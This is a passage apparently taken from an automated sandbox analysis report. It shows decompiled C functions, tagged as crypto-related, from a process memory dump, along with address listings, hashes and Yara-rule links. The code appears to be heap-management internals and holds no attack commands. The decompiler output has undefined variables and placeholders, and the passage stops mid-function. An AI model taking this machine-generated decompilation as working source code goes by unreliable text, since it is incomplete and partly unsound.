                                        0x1e41b7ec
                                        0x1e41b858
                                        0x00000000
                                        0x1e41b858
                                        0x1e41b7ee
                                        0x1e41b7f1
                                        0x1e41b7f4
                                        0x1e41b7ff
                                        0x1e41b850
                                        0x00000000
                                        0x1e41b850
                                        0x1e41b80a
                                        0x1e41b813
                                        0x1e41b81c
                                        0x1e41b81d
                                        0x1e41b822
                                        0x1e41b825
                                        0x1e41b828
                                        0x1e41b831
                                        0x1e41b832
                                        0x1e41b837
                                        0x1e41b840
                                        0x1e41b842
                                        0x1e41b845
                                        0x1e41b848
                                        0x00000000
                                        0x1e41b848
                                        0x1e41b7df
                                        0x00000000
                                        0x1e41b7df
                                        0x1e41b7cc
                                        0x00000000
                                        0x1e41b7cc
                                        0x1e3decc5
                                        0x1e3decc7
                                        0x1e3deccb
                                        0x1e41b79b
                                        0x1e41b79e
                                        0x1e41b7a4
                                        0x00000000
                                        0x00000000
                                        0x1e41b7a6
                                        0x1e41b7a8
                                        0x1e41b7a8
                                        0x1e3decd3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3decd5
                                        0x1e3decd5
                                        0x1e3decd5
                                        0x1e3decd8
                                        0x1e3decda
                                        0x1e3dece4
                                        0x00000000
                                        0x00000000
                                        0x1e3decea
                                        0x1e3deced
                                        0x1e3decf0
                                        0x1e3decf2
                                        0x1e3decfb
                                        0x1e3decfe
                                        0x1e3ded01
                                        0x1e3ded06
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3ded06
                                        0x1e41b7ae
                                        0x1e41b7b1
                                        0x1e41b7b7
                                        0x00000000
                                        0x00000000
                                        0x1e41b7b9
                                        0x1e41b7bb
                                        0x1e3ded08
                                        0x1e3ded08
                                        0x1e3ded0c
                                        0x1e3ded0c
                                        0x00000000
                                        0x1e3dec60
                                        0x1e3dec62
                                        0x1e3ded0f
                                        0x1e3ded0f
                                        0x00000000
                                        0x1e3ded0f
                                        0x1e3dec68
                                        0x1e3dec6c
                                        0x1e3dec6f
                                        0x1e3dec75
                                        0x1e3dec0d
                                        0x1e3dec0d
                                        0x1e3dec18
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3dec18
                                        0x1e3dec77
                                        0x1e3dec79
                                        0x1e3dec79
                                        0x00000000
                                        0x1e3dec68
                                        0x1e3dec5e
                                        0x1e3dec3e
                                        0x1e3debfd
                                        0x1e3dec02
                                        0x1e41b701
                                        0x1e41b70c
                                        0x1e41b71b
                                        0x1e41b71d
                                        0x1e41b71d
                                        0x00000000
                                        0x1e41b70c
                                        0x1e3dec08
                                        0x1e3dec0a
                                        0x00000000
                                        0x1e3dec0a
                                        0x1e3debf5
                                        0x1e3debf5

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                        • Instruction ID: 097d4783adac6b5c0d9c765eb96a3231d038b0de44955d8a77c44c8750b91851
                                        • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                        • Instruction Fuzzy Hash: 34812732E08396CFEB114F6AC8C0259BF56FF52600B68477BE9528F741C265B84AD7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E4725DD, Relevance: .2, Instructions: 232COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E1E4725DD(signed int __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E1E472E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_push("true");
				_pop(_t187);
				_t210 = (( *_t133 ^  *0x1e496110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x1e496110; // 0xc15d2e02
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x1e496110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_push("true");
				_pop(_t154);
				_v12 = E1E3ED340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E1E3ED0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E1E3BFFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x1e38ac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x1e38ac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x1e38ac00; // 0x6060706
					_t48 = _t123 + 0x1e38ac00; // 0x6070708
					_t142 = _v16;
					if(E1E472FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), ?str?) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E1E3C2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1e496110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x1e496110; // 0xc15d2e02
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1e496110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1e496110 ^ _t168) & 0x7fff0000;
					}
					E1E47241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                        0x1e4725e6
                                        0x1e4725f6
                                        0x1e4725fb
                                        0x1e4725fe
                                        0x1e472603
                                        0x1e47260e
                                        0x1e472610
                                        0x1e472611
                                        0x1e472613
                                        0x1e47262f
                                        0x1e472634
                                        0x1e472639
                                        0x1e472641
                                        0x1e472643
                                        0x1e472646
                                        0x1e472648
                                        0x1e472649
                                        0x1e472649
                                        0x1e472649
                                        0x1e472646
                                        0x1e47263b
                                        0x1e47263b
                                        0x1e47263d
                                        0x1e47263d
                                        0x1e472639
                                        0x1e472651
                                        0x1e472653
                                        0x1e472655
                                        0x1e472657
                                        0x1e47265c
                                        0x1e472668
                                        0x1e47266a
                                        0x1e472675
                                        0x1e47267c
                                        0x1e472680
                                        0x1e472684
                                        0x1e472687
                                        0x1e472692
                                        0x1e472695
                                        0x1e472698
                                        0x1e47269d
                                        0x1e4726a2
                                        0x1e4726a4
                                        0x1e4726a4
                                        0x1e4726a8
                                        0x1e4726ad
                                        0x1e4726b2
                                        0x1e4726c0
                                        0x1e4726c6
                                        0x1e4726c9
                                        0x1e4726d1
                                        0x1e4726d4
                                        0x1e4726e2
                                        0x1e4726ea
                                        0x1e4726ed
                                        0x1e4726f1
                                        0x1e4726f6
                                        0x1e4726f9
                                        0x1e472707
                                        0x1e47270d
                                        0x1e472710
                                        0x1e472713
                                        0x1e472718
                                        0x1e47271d
                                        0x1e47271d
                                        0x1e472722
                                        0x1e472750
                                        0x1e472758
                                        0x1e47275d
                                        0x1e472760
                                        0x1e472766
                                        0x1e472769
                                        0x1e47276e
                                        0x1e472771
                                        0x1e472777
                                        0x1e47277d
                                        0x1e472783
                                        0x1e472791
                                        0x1e4727a7
                                        0x1e4727a9
                                        0x1e4727ab
                                        0x1e4727ab
                                        0x1e4727b1
                                        0x1e4727b4
                                        0x1e4727b4
                                        0x1e4727bc
                                        0x1e4727bf
                                        0x1e4727c2
                                        0x1e4727c2
                                        0x1e4727db
                                        0x1e4727df
                                        0x1e4727e5
                                        0x1e4727e8
                                        0x1e4727f0
                                        0x1e4727ff
                                        0x1e4727ff
                                        0x1e4727f2
                                        0x1e4727f4
                                        0x1e4727f4
                                        0x1e47281a
                                        0x1e472824
                                        0x1e472826
                                        0x1e472834
                                        0x1e472843
                                        0x1e472858
                                        0x1e472858
                                        0x1e472866
                                        0x1e472866
                                        0x1e472873

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c07936d7ee3767c36355623f780667e76330a97823e6939fa71b6004a1cbaa8
                                        • Instruction ID: a3862295c8f5c5cd67d601b31262c568cd502809159bc4a36c801e70d6387ab5
                                        • Opcode Fuzzy Hash: 7c07936d7ee3767c36355623f780667e76330a97823e6939fa71b6004a1cbaa8
                                        • Instruction Fuzzy Hash: 3E81C372E101159BCB08CF79C8916BEB7F1FF88211B1686AAD851EB395DA34E901CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E471D55, Relevance: .2, Instructions: 226COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E1E471D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1e481070);
				E1E3FD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E1E47337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E1E4733B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E1E3E96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E1E4733B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E1E3DE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1e495880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t142 = _t136 + 0x14;
						 *((intOrPtr*)(_t136 + 0x14)) = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E1E3DDFDF(_t136 + 0x14, 1, _t142);
					}
					return E1E3FD0D1(_t103);
				}
			}





































                                        0x1e471d55
                                        0x1e471d55
                                        0x1e471d57
                                        0x1e471d5c
                                        0x1e471d63
                                        0x1e471d66
                                        0x1e471d69
                                        0x1e471d6c
                                        0x1e471d6e
                                        0x1e471d71
                                        0x1e471d74
                                        0x1e471d77
                                        0x1e471d7a
                                        0x1e471d7d
                                        0x1e471d82
                                        0x1e471d85
                                        0x1e471d88
                                        0x1e471d8d
                                        0x1e471d90
                                        0x1e471d94
                                        0x1e471d96
                                        0x1e471d98
                                        0x1e471d98
                                        0x1e471d9b
                                        0x1e471d9e
                                        0x00000000
                                        0x1e471da1
                                        0x1e471da5
                                        0x1e471e78
                                        0x1e471e78
                                        0x1e471e82
                                        0x1e471e87
                                        0x1e471e8a
                                        0x1e471e8d
                                        0x1e471e92
                                        0x1e471e95
                                        0x1e471e98
                                        0x1e471e9b
                                        0x1e471ede
                                        0x1e471ee3
                                        0x1e471ee8
                                        0x1e471ef2
                                        0x1e471ef2
                                        0x1e471ef5
                                        0x1e471ef8
                                        0x1e471efe
                                        0x1e471f03
                                        0x00000000
                                        0x1e471f09
                                        0x1e471f0c
                                        0x1e471f0e
                                        0x1e471f11
                                        0x00000000
                                        0x1e471f17
                                        0x1e471f17
                                        0x1e471f1a
                                        0x1e471f31
                                        0x1e471f34
                                        0x1e471f3f
                                        0x1e471f42
                                        0x1e471f45
                                        0x1e471f47
                                        0x1e471f4a
                                        0x1e471f4d
                                        0x1e471f4f
                                        0x1e471f63
                                        0x1e471f65
                                        0x1e471f67
                                        0x00000000
                                        0x1e471f69
                                        0x1e471f69
                                        0x1e471f72
                                        0x1e471f72
                                        0x1e471f75
                                        0x1e471f77
                                        0x00000000
                                        0x00000000
                                        0x1e471f6e
                                        0x1e471f70
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e471f70
                                        0x1e471f83
                                        0x1e471f83
                                        0x1e471f85
                                        0x00000000
                                        0x1e471f85
                                        0x1e471f51
                                        0x1e471f53
                                        0x1e471f5a
                                        0x1e471f5c
                                        0x1e471f87
                                        0x1e471f87
                                        0x1e471f87
                                        0x1e471f8b
                                        0x1e471f8d
                                        0x1e471f90
                                        0x00000000
                                        0x1e471f90
                                        0x1e471f1c
                                        0x1e471f1c
                                        0x00000000
                                        0x1e471f22
                                        0x1e471f22
                                        0x1e471f25
                                        0x1e471f28
                                        0x1e471f97
                                        0x1e471f97
                                        0x1e471f9d
                                        0x1e471fa7
                                        0x1e471faa
                                        0x1e471fb1
                                        0x1e471fb9
                                        0x1e471fbd
                                        0x1e471fbe
                                        0x1e471fc0
                                        0x1e471f2a
                                        0x1e471f93
                                        0x1e471f93
                                        0x1e471f95
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e471f95
                                        0x1e471f28
                                        0x1e471f1c
                                        0x1e471f1a
                                        0x1e471f11
                                        0x1e471e9d
                                        0x1e471ea0
                                        0x1e471eae
                                        0x1e471eb4
                                        0x1e471ebc
                                        0x1e471ebc
                                        0x1e471ec2
                                        0x1e471ec8
                                        0x1e471ecd
                                        0x00000000
                                        0x1e471ed3
                                        0x1e471ed3
                                        0x00000000
                                        0x1e471ed3
                                        0x1e471ecd
                                        0x1e471dab
                                        0x1e471dab
                                        0x1e471db1
                                        0x1e471db3
                                        0x1e471db9
                                        0x1e471dbf
                                        0x1e471dc2
                                        0x1e471dda
                                        0x1e471ddd
                                        0x1e471de0
                                        0x1e471de9
                                        0x1e471dec
                                        0x1e471def
                                        0x1e471df1
                                        0x1e471df3
                                        0x1e471e0a
                                        0x1e471e0c
                                        0x1e471e0e
                                        0x00000000
                                        0x1e471e10
                                        0x1e471e10
                                        0x1e471e13
                                        0x1e471e16
                                        0x1e471e16
                                        0x1e471e19
                                        0x1e471e1c
                                        0x1e471e1e
                                        0x1e471e20
                                        0x00000000
                                        0x00000000
                                        0x1e471e22
                                        0x1e471e24
                                        0x00000000
                                        0x1e471e26
                                        0x00000000
                                        0x1e471e26
                                        0x00000000
                                        0x1e471e24
                                        0x1e471e30
                                        0x1e471e30
                                        0x00000000
                                        0x1e471e30
                                        0x1e471df5
                                        0x1e471df7
                                        0x1e471e01
                                        0x1e471e32
                                        0x1e471e34
                                        0x1e471e36
                                        0x00000000
                                        0x1e471e36
                                        0x1e471dc4
                                        0x1e471dc4
                                        0x00000000
                                        0x1e471dc6
                                        0x1e471dc6
                                        0x1e471dc9
                                        0x1e471dcf
                                        0x1e471dd1
                                        0x1e471e38
                                        0x1e471e38
                                        0x1e471e38
                                        0x1e471e38
                                        0x1e471dc4
                                        0x1e471dbb
                                        0x1e471dbb
                                        0x1e471dbb
                                        0x1e471dbb
                                        0x1e471e3a
                                        0x1e471e3a
                                        0x1e471e3d
                                        0x1e471e40
                                        0x1e471e43
                                        0x1e471e6f
                                        0x1e471fc7
                                        0x1e471fc7
                                        0x1e471e75
                                        0x1e471e75
                                        0x00000000
                                        0x1e471e75
                                        0x1e471e6f
                                        0x1e471fca
                                        0x1e471fca
                                        0x1e471fce
                                        0x1e471fd0
                                        0x1e471fd3
                                        0x1e471fd9
                                        0x1e471fde
                                        0x1e471fe4
                                        0x1e471fe4
                                        0x1e471fee
                                        0x1e471fee

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
                                        • Instruction ID: 7fb750c4c9091f84531e326bb53b5614921b848db16c385013b262d1adb4b2f1
                                        • Opcode Fuzzy Hash: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
                                        • Instruction Fuzzy Hash: 19814C75E102598FDB08CFA9C8909ECB7F3BF49354B14436AE415AB394DB31A94ACF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E46DBD2, Relevance: .2, Instructions: 212COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E1E46DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed short _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				signed int _t112;
				signed int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1e496114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t75 = _t119 + 0x10;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = E1E46D016(_t119, _t183, _t119, _t78);
									E1E3BFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E1E46C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x1e38aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E1E3BFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E1E46E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x1e38aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
